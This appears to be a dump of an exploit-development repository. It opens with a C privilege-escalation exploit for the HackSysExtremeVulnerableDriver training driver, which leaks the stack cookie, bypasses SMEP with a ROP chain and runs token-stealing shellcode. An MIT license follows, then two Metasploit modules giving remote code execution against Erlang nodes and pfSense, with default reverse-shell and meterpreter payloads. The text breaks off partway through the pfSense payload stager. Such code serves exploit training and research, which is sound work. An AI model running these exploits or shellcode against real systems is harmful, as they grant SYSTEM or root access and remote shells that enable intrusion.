20 | typedef struct _UNICODE_STRING { 21 | USHORT Length; 22 | USHORT MaximumLength; 23 | #ifdef MIDL_PASS 24 | [size_is(MaximumLength / 2), length_is((Length) / 2) ] USHORT * Buffer; 25 | #else // MIDL_PASS 26 | _Field_size_bytes_part_opt_(MaximumLength, Length) PWCH Buffer; 27 | #endif // MIDL_PASS 28 | } UNICODE_STRING; 29 | typedef UNICODE_STRING *PUNICODE_STRING; 30 | typedef const UNICODE_STRING *PCUNICODE_STRING; 31 | 32 | //from http://boinc.berkeley.edu/android-boinc/boinc/lib/diagnostics_win.h 33 | typedef struct _VM_COUNTERS { 34 | // the following was inferred by painful reverse engineering 35 | SIZE_T PeakVirtualSize; // not actually 36 | SIZE_T PageFaultCount; 37 | SIZE_T PeakWorkingSetSize; 38 | SIZE_T WorkingSetSize; 39 | SIZE_T QuotaPeakPagedPoolUsage; 40 | SIZE_T QuotaPagedPoolUsage; 41 | SIZE_T QuotaPeakNonPagedPoolUsage; 42 | SIZE_T QuotaNonPagedPoolUsage; 43 | SIZE_T PagefileUsage; 44 | SIZE_T PeakPagefileUsage; 45 | SIZE_T VirtualSize; // not actually 46 | } VM_COUNTERS; 47 | 48 | typedef enum _KWAIT_REASON 49 | { 50 | Executive = 0, 51 | FreePage = 1, 52 | PageIn = 2, 53 | PoolAllocation = 3, 54 | DelayExecution = 4, 55 | Suspended = 5, 56 | UserRequest = 6, 57 | WrExecutive = 7, 58 | WrFreePage = 8, 59 | WrPageIn = 9, 60 | WrPoolAllocation = 10, 61 | WrDelayExecution = 11, 62 | WrSuspended = 12, 63 | WrUserRequest = 13, 64 | WrEventPair = 14, 65 | WrQueue = 15, 66 | WrLpcReceive = 16, 67 | WrLpcReply = 17, 68 | WrVirtualMemory = 18, 69 | WrPageOut = 19, 70 | WrRendezvous = 20, 71 | Spare2 = 21, 72 | Spare3 = 22, 73 | Spare4 = 23, 74 | Spare5 = 24, 75 | WrCalloutStack = 25, 76 | WrKernel = 26, 77 | WrResource = 27, 78 | WrPushLock = 28, 79 | WrMutex = 29, 80 | WrQuantumEnd = 30, 81 | WrDispatchInt = 31, 82 | WrPreempted = 32, 83 | WrYieldExecution = 33, 84 | WrFastMutex = 34, 85 | WrGuardedMutex = 35, 86 | WrRundown = 36, 87 | MaximumWaitReason = 37 88 | } KWAIT_REASON; 89 | 90 | typedef struct _SYSTEM_THREAD_INFORMATION { 91 | LARGE_INTEGER KernelTime; 92 | LARGE_INTEGER UserTime; 93 | LARGE_INTEGER CreateTime; 94 | ULONG WaitTime; 95 | PVOID StartAddress; 96 | CLIENT_ID ClientId; 97 | KPRIORITY Priority; 98 | LONG BasePriority; 99 | ULONG ContextSwitchCount; 100 | ULONG ThreadState; 101 | KWAIT_REASON WaitReason; 102 | #ifdef _WIN64 103 | ULONG Reserved[4]; 104 | #endif 105 | } SYSTEM_THREAD_INFORMATION, *PSYSTEM_THREAD_INFORMATION; 106 | 107 | typedef struct _SYSTEM_EXTENDED_THREAD_INFORMATION 108 | { 109 | SYSTEM_THREAD_INFORMATION ThreadInfo; 110 | PVOID StackBase; 111 | PVOID StackLimit; 112 | PVOID Win32StartAddress; 113 | PVOID TebAddress; /* This is only filled in on Vista and above */ 114 | ULONG Reserved1; 115 | ULONG Reserved2; 116 | ULONG Reserved3; 117 | } SYSTEM_EXTENDED_THREAD_INFORMATION, *PSYSTEM_EXTENDED_THREAD_INFORMATION; 118 | 119 | typedef struct _SYSTEM_EXTENDED_PROCESS_INFORMATION 120 | { 121 | ULONG NextEntryOffset; 122 | ULONG NumberOfThreads; 123 | LARGE_INTEGER SpareLi1; 124 | LARGE_INTEGER SpareLi2; 125 | LARGE_INTEGER SpareLi3; 126 | LARGE_INTEGER CreateTime; 127 | LARGE_INTEGER UserTime; 128 | LARGE_INTEGER KernelTime; 129 | UNICODE_STRING ImageName; 130 | KPRIORITY BasePriority; 131 | ULONG ProcessId; 132 | ULONG InheritedFromUniqueProcessId; 133 | ULONG HandleCount; 134 | ULONG SessionId; 135 | PVOID PageDirectoryBase; 136 | VM_COUNTERS VirtualMemoryCounters; 137 | SIZE_T PrivatePageCount; 138 | IO_COUNTERS IoCounters; 139 | SYSTEM_EXTENDED_THREAD_INFORMATION Threads[1]; 140 | } SYSTEM_EXTENDED_PROCESS_INFORMATION, *PSYSTEM_EXTENDED_PROCESS_INFORMATION; 141 | 142 | typedef enum _SYSTEM_INFORMATION_CLASS { 143 | SystemExtendedProcessInformation = 57 144 | } SYSTEM_INFORMATION_CLASS; 145 | 146 | typedef NTSTATUS(WINAPI *PNtQuerySystemInformation)( 147 | __in SYSTEM_INFORMATION_CLASS SystemInformationClass, 148 | __inout PVOID SystemInformation, 149 | __in ULONG SystemInformationLength, 150 | __out_opt PULONG ReturnLength 151 | ); 152 | 153 | /* IOCTL */ 154 | #define STACK_OVERFLOW_GS_IOCTL 0x222007 155 | #define ARBITRARY_WRITE_IOCTL 0x22200b 156 | 157 | /* Structure used by Write-What-Where */ 158 | typedef struct _WRITE_WHAT_WHERE 159 | { 160 | uint64_t *ullpWhat; 161 | uint64_t *ullpWhere; 162 | } WRITE_WHAT_WHERE, *PWRITE_WHAT_WHERE; 163 | 164 | /* Exploit Settings */ 165 | #define ALLOCATION_SIZE 0x900 166 | 167 | /* GetKernelModuleBase(): 168 | Function used to obtain kernel module address */ 169 | LPVOID GetKernelModuleBase(PCHAR pKernelModule) 170 | { 171 | char pcDriver[1024] = { 0 }; 172 | LPVOID lpvTargetDriver = NULL; 173 | LPVOID *lpvDrivers = NULL; 174 | DWORD dwCB = 0; 175 | DWORD dwDrivers = 0; 176 | DWORD i = 0; 177 | 178 | EnumDeviceDrivers(NULL, dwCB, &dwCB); 179 | if (dwCB <= 0) 180 | return NULL; 181 | 182 | lpvDrivers = (LPVOID *)malloc(dwCB * sizeof(LPVOID)); 183 | if (lpvDrivers == NULL) 184 | return NULL; 185 | 186 | if (EnumDeviceDrivers(lpvDrivers, dwCB, &dwCB)) 187 | { 188 | dwDrivers = dwCB / sizeof(LPVOID); 189 | for (i = 0; i < dwDrivers; i++) 190 | if (GetDeviceDriverBaseNameA(lpvDrivers[i], pcDriver, sizeof(pcDriver))) 191 | if (StrStrA(pcDriver, pKernelModule) != NULL) 192 | lpvTargetDriver = lpvDrivers[i]; 193 | } 194 | 195 | free(lpvDrivers); 196 | 197 | return lpvTargetDriver; 198 | } 199 | 200 | /* CheckWin(): 201 | Simple function to check if we're running as SYSTEM */ 202 | int CheckWin(VOID) 203 | { 204 | DWORD win = 0; 205 | DWORD dwLen = 0; 206 | CHAR *cUsername = NULL; 207 | 208 | GetUserNameA(NULL, &dwLen); 209 | 210 | if (dwLen > 0) { 211 | cUsername = (CHAR *)malloc(dwLen * sizeof(CHAR)); 212 | } else { 213 | printf("[-] Failed to allocate buffer for username check\n"); 214 | return -1; 215 | } 216 | 217 | GetUserNameA(cUsername, &dwLen); 218 | 219 | win = strcmp(cUsername, "SYSTEM"); 220 | free(cUsername); 221 | 222 | return (win == 0) ? win : -1; 223 | } 224 | 225 | /* GenerateExploitBuffer(): 226 | Generate the buffer that will overwrite the return address and grant control over the instruction pointer. */ 227 | DWORD GenerateExploitBuffer(LPVOID lpvNt, LPVOID lpvStackLeak, uint64_t cookie, LPVOID lpvBuffer) 228 | { 229 | size_t j = 0; 230 | size_t i = 0; 231 | LPVOID shellcode = NULL; 232 | uint64_t nt = (uint64_t)(lpvNt); 233 | uint64_t stack = (uint64_t)(lpvStackLeak); 234 | uint64_t *payload = (uint64_t *)(lpvBuffer); 235 | 236 | uint8_t sc[129] = { 237 | // sickle-tool -p windows/x64/kernel_token_stealer -f num (58 bytes) 238 | 0x65, 0x48, 0xa1, 0x88, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x80, 239 | 0xb8, 0x00, 0x00, 0x00, 0x48, 0x89, 0xc1, 0xb2, 0x04, 0x48, 0x8b, 0x80, 0x48, 0x04, 240 | 0x00, 0x00, 0x48, 0x2d, 0x48, 0x04, 0x00, 0x00, 0x38, 0x90, 0x40, 0x04, 0x00, 0x00, 241 | 0x75, 0xeb, 0x48, 0x8b, 0x90, 0xb8, 0x04, 0x00, 0x00, 0x48, 0x89, 0x91, 0xb8, 0x04, 242 | 0x00, 0x00, 243 | 244 | // sickle-tool -p windows/x64/kernel_sysret -f num (71) 245 | 0x65, 0x48, 0xa1, 0x88, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x66, 0x8b, 0x88, 246 | 0xe4, 0x01, 0x00, 0x00, 0x66, 0xff, 0xc1, 0x66, 0x89, 0x88, 0xe4, 0x01, 0x00, 0x00, 247 | 0x48, 0x8b, 0x90, 0x90, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x8a, 0x68, 0x01, 0x00, 0x00, 248 | 0x4c, 0x8b, 0x9a, 0x78, 0x01, 0x00, 0x00, 0x48, 0x8b, 0xa2, 0x80, 0x01, 0x00, 0x00, 249 | 0x48, 0x8b, 0xaa, 0x58, 0x01, 0x00, 0x00, 0x31, 0xc0, 0x0f, 0x01, 0xf8, 0x48, 0x0f, 250 | 0x07 }; 251 | 252 | shellcode = VirtualAlloc(NULL, sizeof(sc), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE); 253 | if (shellcode == NULL) 254 | { 255 | printf("[-] Failed to allocate memory for shellcode\n"); 256 | return -1; 257 | } 258 | RtlCopyMemory(shellcode, sc, 129); 259 | 260 | /* Adjust the stack pointer */ 261 | stack -= 0xb30; 262 | printf("\t[*] Writing stack cookie @{0x%p}\n", stack); 263 | 264 | /* Overflow past the size of the buffer */ 265 | for (i = 0; i < (512 / sizeof(uint64_t)); i++) 266 | { 267 | payload[i] = 0x4141414141414141; 268 | } 269 | 270 | payload[i++] = (stack ^ cookie); /* Stack Cookie */ 271 | 272 | /* Offset to shellcode start */ 273 | payload[i++] = 0x4343434343434343; 274 | payload[i++] = 0x4444444444444444; 275 | payload[i++] = 0x4545454545454545; 276 | payload[i++] = 0x4646464646464646; 277 | payload[i++] = 0x4747474747474747; 278 | payload[i++] = 0x4848484848484848; 279 | 280 | /* Prepare RDX register for later. This is needed for the XOR operation */ 281 | payload[i++] = nt + 0x40ed4e; // pop rdx ; pop rax ; pop rcx ; ret 282 | payload[i++] = 0x000008; // Set RDX to 0x08, we will need this to accomplish the XOR 283 | payload[i++] = 0x000000; // [filler] 284 | payload[i++] = 0x000000; // [filler] 285 | 286 | /* Setup the call to MiGetPteAddress in order to get the address of the PTE for our 287 | userland code. The setup is as follows: 288 | 289 | RAX -> VOID *MiGetPteAddress( 290 | ( RCX == PTE / Userland Code ) 291 | ); 292 | 293 | Once the call is complete RAX should contain the pointer to our PTE. */ 294 | payload[i++] = nt + 0x57699c; // pop rcx ; ret 295 | payload[i++] = (uint64_t)shellcode; // *shellcode 296 | payload[i++] = nt + 0x24aaec; // MiGetPteAddress() 297 | 298 | /* Now that we have obtained the PTE address, we can modify the 2nd bit in order to 299 | mark the page as a kernel page (U -> K). We can do this using XOR ;) */ 300 | payload[i++] = nt + 0x30fcf3; // sub rax, rdx ; ret 301 | payload[i++] = nt + 0x54f344; // push rax ; pop rbx ; ret 302 | payload[i++] = nt + 0x40ed4e; // pop rdx ; pop rax ; pop rcx ; ret 303 | payload[i++] = 0x000004; // 0x40ed4e: pop rdx ; pop rax ; pop rcx ; ret ; (1 found) 304 | payload[i++] = 0x000000; // [filler] 305 | payload[i++] = 0x000000; // [filler] 306 | payload[i++] = nt + 0x3788b6; // xor [rbx+0x08], edx ; mov rbx, qword [rsp+0x60] ; add rsp, 0x40 ; pop r14 ; pop rdi ; pop rbp ; ret 307 | 308 | /* Now we cam spray our shellcode address since SMEP and VPS should be bypassed */ 309 | for (j = 0; j < 0xC; j++) { 310 | payload[i++] = (uint64_t)shellcode; 311 | } 312 | 313 | printf("\t[*] Generated %d bytes ...\n", (i * sizeof(uint64_t))); 314 | 315 | return (i * sizeof(uint64_t)); 316 | } 317 | 318 | /* WriteBytes(): 319 | Arbitrary write located in the TriggerArbitraryWrite() function */ 320 | void WriteBytes(HANDLE hHEVD, uint64_t* u64What, uint64_t* u64Where) 321 | { 322 | DWORD dwBytesReturned = 0; 323 | WRITE_WHAT_WHERE www = { 0 }; 324 | 325 | www.ullpWhere = u64Where; 326 | www.ullpWhat = u64What; 327 | 328 | printf("\t[*] Writing 0x%p to 0x%p\n", www.ullpWhat, www.ullpWhere); 329 | 330 | DeviceIoControl(hHEVD, 331 | ARBITRARY_WRITE_IOCTL, 332 | &www, 333 | sizeof(WRITE_WHAT_WHERE), 334 | NULL, 335 | 0x00, 336 | &dwBytesReturned, 337 | NULL); 338 | } 339 | 340 | /* LeakCookie(): 341 | Leverage the ARBITRARY_WRITE_IOCTL to write to our variable in Userland from 342 | Kernel Land. */ 343 | uint64_t LeakCookie(HANDLE hHEVD, LPVOID lpvHEVD) 344 | { 345 | uint64_t cookie = 0; 346 | uint64_t *pu64Cookie = (uint64_t *)(lpvHEVD + 0x3000); 347 | 348 | printf("\t[*] Cookie located @{0x%p}\n", pu64Cookie); 349 | WriteBytes(hHEVD, pu64Cookie, &cookie); 350 | 351 | printf("\t[+] Cookie leaked: 0x%p\n", cookie); 352 | 353 | return cookie; 354 | } 355 | 356 | void LeakStack(wchar_t *targetPoC, LPVOID *lpvStackLeak) 357 | { 358 | HMODULE ntdll = GetModuleHandle(TEXT("ntdll")); 359 | PNtQuerySystemInformation query = (PNtQuerySystemInformation)GetProcAddress(ntdll, "NtQuerySystemInformation"); 360 | if (query == NULL) { 361 | printf("GetProcAddress() failed.\n"); 362 | exit(-1); 363 | } 364 | 365 | ULONG len = 2000; 366 | NTSTATUS status = 0x00; 367 | PSYSTEM_EXTENDED_PROCESS_INFORMATION pProcessInfo = NULL; 368 | do { 369 | len *= 2; 370 | pProcessInfo = (PSYSTEM_EXTENDED_PROCESS_INFORMATION)GlobalAlloc(GMEM_ZEROINIT, len); 371 | status = query(SystemExtendedProcessInformation, pProcessInfo, len, &len); 372 | } while (status == (NTSTATUS)0xc0000004); 373 | 374 | if (status != (NTSTATUS)0x0) { 375 | printf("NtQuerySystemInformation failed with error code 0x%X\n", status); 376 | exit(-1); 377 | } 378 | 379 | LPVOID stackBase = NULL; 380 | LPVOID stackLimit = NULL; 381 | while (pProcessInfo->NextEntryOffset != 0x00) { 382 | // Strangely I was able to do this with the pProcessInfo->ImageName.Buffer being NULL? 383 | if (StrStrW(pProcessInfo->ImageName.Buffer, targetPoC) != NULL) { 384 | printf("[*] Leaking stack from %ls\n", targetPoC); 385 | for (unsigned int i = 0; i < pProcessInfo->NumberOfThreads; i++) { 386 | stackBase = pProcessInfo->Threads[i].StackBase; 387 | stackLimit = pProcessInfo->Threads[i].StackLimit; 388 | #ifdef _WIN64 389 | printf("\t[*] Stack base 0x%p\tStack limit 0x%p\n", stackBase, stackLimit); 390 | #else 391 | printf("\t[*] Stack base 0x%X\tStack limit 0x%X\n", stackBase, stackLimit); 392 | #endif 393 | break; 394 | } 395 | } 396 | 397 | if (!pProcessInfo->NextEntryOffset) { 398 | pProcessInfo = NULL; 399 | } else { 400 | pProcessInfo = (PSYSTEM_EXTENDED_PROCESS_INFORMATION)((ULONG_PTR)pProcessInfo + pProcessInfo->NextEntryOffset); 401 | } 402 | } 403 | 404 | *lpvStackLeak = stackBase; 405 | } 406 | 407 | /* Exploit(): 408 | Stack Overflow (GS) */ 409 | int Exploit(HANDLE hHEVD) 410 | { 411 | uint64_t cookie = 0x00; 412 | 413 | DWORD dwExploitBuffer = 0; 414 | DWORD dwBytesReturned = 0; 415 | 416 | LPVOID lpvStackLeak = NULL; 417 | LPVOID lpvMemoryAlloc = NULL; 418 | LPVOID lpvHEVD = GetKernelModuleBase("HEVD"); 419 | LPVOID lpvNtKrnl = GetKernelModuleBase("ntoskrnl"); 420 | 421 | if (lpvHEVD == NULL) 422 | { 423 | printf("[-] Failed to obtain the base address of HEVD\n"); 424 | return -1; 425 | } 426 | 427 | if (lpvNtKrnl == NULL) 428 | { 429 | printf("[-] Failed to obtain the base address of ntoskrnl\n"); 430 | return -1; 431 | } 432 | 433 | printf("[*] Exploitation started....\n"); 434 | printf("[*] Base address of HEVD @{0x%p}\n", lpvHEVD); 435 | printf("[*] Base address of NT @{0x%p}\n", lpvNtKrnl); 436 | 437 | printf("[*] Attempting to leak __security_cookie\n"); 438 | cookie = LeakCookie(hHEVD, lpvHEVD); 439 | if (cookie == 0x00) 440 | { 441 | printf("[-] Failed to leak stack cookie\n"); 442 | } 443 | 444 | /* I found I need to hammer the stack leak to get it to work :| */ 445 | while (1) { 446 | LeakStack(L"poc.exe", &lpvStackLeak); 447 | if (lpvStackLeak != NULL) { 448 | break; 449 | } 450 | } 451 | 452 | if (lpvStackLeak == NULL) 453 | { 454 | printf("[-] Failed to leak stack address\n"); 455 | return -1; 456 | } 457 | 458 | lpvMemoryAlloc = VirtualAlloc(NULL, 459 | ALLOCATION_SIZE, 460 | (MEM_COMMIT | MEM_RESERVE), 461 | PAGE_EXECUTE_READWRITE); 462 | if (lpvMemoryAlloc == NULL) 463 | { 464 | printf("[*] Failed to create exploitation buffer\n"); 465 | return -1; 466 | } 467 | 468 | dwExploitBuffer = GenerateExploitBuffer(lpvNtKrnl, lpvStackLeak, cookie, lpvMemoryAlloc); 469 | printf("[*] Sending payload!!!\n", dwExploitBuffer); 470 | 471 | DeviceIoControl(hHEVD, 472 | STACK_OVERFLOW_GS_IOCTL, 473 | lpvMemoryAlloc, 474 | dwExploitBuffer, 475 | NULL, 476 | 0x00, 477 | &dwBytesReturned, 478 | NULL); 479 | 480 | return CheckWin(); 481 | } 482 | 483 | int main() 484 | { 485 | HANDLE hHEVD = NULL; 486 | 487 | hHEVD = CreateFileA("\\\\.\\HackSysExtremeVulnerableDriver", 488 | (GENERIC_READ | GENERIC_WRITE), 489 | 0x00, 490 | NULL, 491 | OPEN_EXISTING, 492 | FILE_ATTRIBUTE_NORMAL, 493 | NULL); 494 | 495 | if (hHEVD == NULL) 496 | { 497 | printf("[-] Failed to get a handle on HackSysExtremeVulnerableDriver\n"); 498 | return -1; 499 | } 500 | 501 | if (Exploit(hHEVD) == 0) { 502 | printf("[*] Exploitation success!!! Enjoy de shell!!\n\n"); 503 | system("cmd.exe"); 504 | } else { 505 | printf("[-] Exploitation failed, run again\n"); 506 | } 507 | 508 | if (hHEVD != INVALID_HANDLE_VALUE) { 509 | CloseHandle(hHEVD); 510 | } 511 | } 512 | -------------------------------------------------------------------------------- /LICENSE.md: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2017 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | -------------------------------------------------------------------------------- /Metasploit-Modules/erlang_cookie_rce.rb: -------------------------------------------------------------------------------- 1 | ## 2 | # This module requires Metasploit: https://metasploit.com/download 3 | # Current source: https://github.com/rapid7/metasploit-framework 4 | ## 5 | 6 | class MetasploitModule < Msf::Exploit::Remote 7 | Rank = GreatRanking 8 | 9 | include Msf::Exploit::Remote::Tcp 10 | 11 | def initialize(info = {}) 12 | super( 13 | update_info( 14 | info, 15 | 'Name' => 'Erlang Port Mapper Daemon Cookie RCE', 16 | 'Description' => %q{ 17 | The erlang port mapper daemon is used to coordinate distributed erlang instances. 18 | Should an attacker get the authentication cookie RCE is trivial. Usually, this 19 | cookie is named ".erlang.cookie" and varies on location. 20 | }, 21 | 'Author' => 22 | [ 23 | 'Daniel Mende', # blog post article 24 | 'Milton Valencia (wetw0rk)', # metasploit module 25 | ], 26 | 'References' => 27 | [ 28 | ['URL', 'https://insinuator.net/2017/10/erlang-distribution-rce-and-a-cookie-bruteforcer/'] 29 | ], 30 | 'License' => MSF_LICENSE, 31 | 'Platform' => ['unix', 'win'], 32 | 'Arch' => ARCH_CMD, 33 | 'Privileged' => 'false', 34 | 'Targets' => 35 | [ 36 | [ 'Unix', 37 | 'Platform' => 'unix', 38 | 'Arch' => ARCH_CMD, 39 | 'DefaultOptions' => {'PAYLOAD' => 'cmd/unix/reverse'}, 40 | ], 41 | [ 'Windows', 42 | 'Platform' => 'win', 43 | 'Arch' => ARCH_CMD, 44 | 'DefaultOptions' => {'PAYLOAD' => 'cmd/windows/adduser'}, 45 | ] 46 | ], 47 | 'DefaultTarget' => 0, 48 | 'DisclosureDate' => 'Nov 20, 2009', # https://github.com/erlang/otp/blob/master/lib/kernel/src/os.erl (history) 49 | ) 50 | ) 51 | 52 | register_options( 53 | [ 54 | OptString.new('COOKIE', [ true, 'Erlang cookie to login with']), 55 | Opt::RPORT(25672) 56 | ]) 57 | end 58 | 59 | def generate_challenge_digest(challenge) 60 | challenge = challenge.unpack('H*')[0].to_i(16).to_s 61 | 62 | hash = Digest::MD5.new 63 | hash.update(datastore['COOKIE']) 64 | hash.update(challenge) 65 | 66 | vprint_status("MD5 digest generated: #{hash.hexdigest}") 67 | return [hash.hexdigest].pack('H*') 68 | end 69 | 70 | def exploit 71 | connect 72 | 73 | our_node = "#{rand_text_alphanumeric(6..12)}@#{rand_text_alphanumeric(6..12)}" 74 | 75 | # SEND_NAME: send initial identification of who "we" are 76 | send_name = "\x00" # Length: 0x0000 77 | send_name << [(our_node.length+7).to_s(16)].pack('H*') # 78 | send_name << "\x6e" # Tag: n 79 | send_name << "\x00\x05" # Version: R6 (5) 80 | send_name << "\x00\x03\x49\x9c" # Flags (0x0003499c) 81 | send_name << "#{our_node}" # @ 82 | 83 | # SEND_CHALLENGE_REPLY: return generated digest and its own challenge 84 | send_challenge_reply = "\x00\x15" # Length: 21 85 | send_challenge_reply << "\x72" # Tag: r 86 | 87 | # SEND: send the message to the node 88 | send = "\x00\x00\x00" # Length:0x00000000 89 | send << [(0x50 + payload.raw.length + our_node.length*2).to_s(16)].pack('H*') # 90 | send << "\x70" # 91 | send << "\x83" # VERSION_MAGIC 92 | send << "\x68" # SMALL_TUPLE_EXT (104) 93 | send << "\x04" # Arity: 4 94 | send << "\x61" # SMALL_INTEGER_EXT 95 | send << "\x06" # Int: 6 96 | send << "\x67" # PID_EXT (103) 97 | send << "\x64\x00" # Node: 98 | send << [(our_node.length).to_s(16)].pack('H*') # Length: strlen(Node) 99 | send << "#{our_node}" # Node 100 | send << "\x00\x00\x00\x03" # ID 101 | send << "\x00\x00\x00\x00" # Serial 102 | send << "\x00" # Creation 103 | send << "\x64" # InternalSegmentIndex 104 | send << "\x00\x00" # Len: 0x0000 105 | send << "\x64" # InternalSegmentIndex 106 | send << "\x00\x03" # Length: 3 107 | send << "rex" # AtomText: rex 108 | send << "\x83\x68\x02\x67\x64\x00" # 109 | send << [(our_node.length).to_s(16)].pack('H*') # Length: strlen(Node) 110 | send << "#{our_node}" # Node 111 | send << "\x00\x00\x00\x03" # ID 112 | send << "\x00\x00\x00\x00" # Serial 113 | send << "\x00" # Creation 114 | send << "\x68" # SMALL_TUPLE_EXT (104) 115 | send << "\x05" # Arity: 5 116 | send << "\x64" # InternalSegmentIndex 117 | send << "\x00\x04" # Length: 4 118 | send << "call" # AtomText: call 119 | send << "\x64" # InternalSegmentIndex 120 | send << "\x00\x02" # Length: 2 121 | send << "os" # AtomText: os 122 | send << "\x64" # InternalSegmentIndex 123 | send << "\x00\x03" # Length: 3 124 | send << "cmd" # AtomText: cmd 125 | send << "\x6c" # LIST_EXT 126 | send << "\x00\x00\x00\x01" # Length: 1 127 | send << "\x6b" # Elements: k 128 | send << "\x00" # Tail 129 | send << [(payload.raw.length).to_s(16)].pack('H*') # strlen(Command) 130 | send << payload.raw # Command 131 | send << "\x6a" # NIL_EXT 132 | send << "\x64" # InternalSegmentIndex 133 | send << "\x00\x04" # Length: 4 134 | send << "user" # AtomText: user 135 | 136 | sock.put(send_name) 137 | 138 | # recieve servers "SEND_CHALLENGE" token (4 bytes) 139 | print_status("Receiving server challenge") 140 | challenge = sock.get 141 | challenge = challenge[14,4] 142 | 143 | send_challenge_reply << challenge 144 | send_challenge_reply << generate_challenge_digest(challenge) 145 | 146 | print_status("Sending challenge reply") 147 | sock.put(send_challenge_reply) 148 | 149 | if sock.get.length < 1 150 | fail_with(Failure::UnexpectedReply, "Authentication Failed:#{datastore['COOKIE']}") 151 | end 152 | 153 | print_good("Authentication successful, sending payload") 154 | sock.put(send) 155 | end 156 | end 157 | -------------------------------------------------------------------------------- /Metasploit-Modules/pfsense_graph_injection_exec.rb: -------------------------------------------------------------------------------- 1 | ## 2 | # This module requires Metasploit: https://metasploit.com/download 3 | # Current source: https://github.com/rapid7/metasploit-framework 4 | ## 5 | 6 | class MetasploitModule < Msf::Exploit::Remote 7 | Rank = ExcellentRanking 8 | 9 | include Msf::Exploit::Remote::HttpClient 10 | include Msf::Exploit::FileDropper 11 | 12 | def initialize(info = {}) 13 | super( 14 | update_info( 15 | info, 16 | 'Name' => 'pfSense authenticated graph status RCE', 17 | 'Description' => %q( 18 | pfSense, a free BSD based open source firewall distribution, 19 | version <= 2.2.6 contains a remote command execution 20 | vulnerability post authentication in the _rrd_graph_img.php page. 21 | The vulnerability occurs via the graph GET parameter. A non-administrative 22 | authenticated attacker can inject arbitrary operating system commands 23 | and execute them as the root user. Verified against 2.2.6, 2.2.5, and 2.1.3. 24 | ), 25 | 'Author' => 26 | [ 27 | 'Security-Assessment.com', # discovery 28 | 'Milton Valencia', # metasploit module 29 | 'Jared Stephens', # python script 30 | ], 31 | 'References' => 32 | [ 33 | [ 'EDB', '39709' ], 34 | [ 'URL', 'http://www.security-assessment.com/files/documents/advisory/pfsenseAdvisory.pdf'] 35 | ], 36 | 'License' => MSF_LICENSE, 37 | 'Platform' => 'php', 38 | 'Privileged' => 'true', 39 | 'DefaultOptions' => 40 | { 41 | 'SSL' => true, 42 | 'PAYLOAD' => 'php/meterpreter/reverse_tcp', 43 | 'Encoder' => 'php/base64' 44 | }, 45 | 'Arch' => [ ARCH_PHP ], 46 | 'Payload' => 47 | { 48 | 'Space' => 6000, 49 | 'Compat' => 50 | { 51 | 'ConnectionType' => '-bind', 52 | } 53 | }, 54 | 'Targets' => [[ 'Automatic Target', {} ]], 55 | 'DefaultTarget' => 0, 56 | 'DisclosureDate' => 'Apr 18, 2016', 57 | ) 58 | ) 59 | 60 | register_options( 61 | [ 62 | OptString.new('USERNAME', [ true, 'User to login with', 'admin']), 63 | OptString.new('PASSWORD', [ true, 'Password to login with', 'pfsense']), 64 | Opt::RPORT(443) 65 | ], self.class 66 | ) 67 | end 68 | 69 | def login 70 | res = send_request_cgi( 71 | 'uri' => '/index.php', 72 | 'method' => 'GET' 73 | ) 74 | fail_with(Failure::UnexpectedReply, "#{peer} - Could not connect to web service - no response") if res.nil? 75 | fail_with(Failure::UnexpectedReply, "#{peer} - Invalid credentials (response code: #{res.code})") if res.code != 200 76 | 77 | /var csrfMagicToken = "(?sid:[a-z0-9,;:]+)";/ =~ res.body 78 | fail_with(Failure::UnexpectedReply, "#{peer} - Could not determine CSRF token") if csrf.nil? 79 | vprint_status("CSRF Token for login: #{csrf}") 80 | 81 | res = send_request_cgi( 82 | 'uri' => '/index.php', 83 | 'method' => 'POST', 84 | 'vars_post' => { 85 | '__csrf_magic' => csrf, 86 | 'usernamefld' => datastore['USERNAME'], 87 | 'passwordfld' => datastore['PASSWORD'], 88 | 'login' => '' 89 | } 90 | ) 91 | unless res 92 | fail_with(Failure::UnexpectedReply, "#{peer} - Did not respond to authentication request") 93 | end 94 | if res.code == 302 95 | vprint_status("Authentication successful: #{datastore['USERNAME']}:#{datastore['PASSWORD']}") 96 | return res.get_cookies 97 | else 98 | fail_with(Failure::UnexpectedReply, "#{peer} - Authentication Failed: #{datastore['USERNAME']}:#{datastore['PASSWORD']}") 99 | return nil 100 | end 101 | end 102 | 103 | def detect_version(cookie) 104 | res = send_request_cgi( 105 | 'uri' => '/index.php', 106 | 'method' => 'GET', 107 | 'cookie' => cookie 108 | ) 109 | unless res 110 | fail_with(Failure::UnexpectedReply, "#{peer} - Did not respond to authentication request") 111 | end 112 | /Version.+(?[0-9\.\-RELEASE]+)[\n]?<\/strong>/m =~ res.body 113 | if version 114 | print_status("Detected pfSense #{version}, uploading intial payload") 115 | return Gem::Version.new(version) 116 | end 117 | # If the device isn't fully setup, you get stuck at redirects to wizard.php 118 | # however, this does NOT stop exploitation strangely 119 | print_error('pfSense version not detected or wizard still enabled.') 120 | Gem::Version.new('0.0') 121 | end 122 | 123 | def exploit 124 | begin 125 | cookie = login 126 | version = detect_version(cookie) 127 | filename = rand_text_alpha(rand(1..10)) 128 | 129 | # generate the PHP meterpreter payload 130 | stager = 'echo \'\' > #{filename}" 133 | # here we begin the encoding process to 134 | # convert the payload to octal! 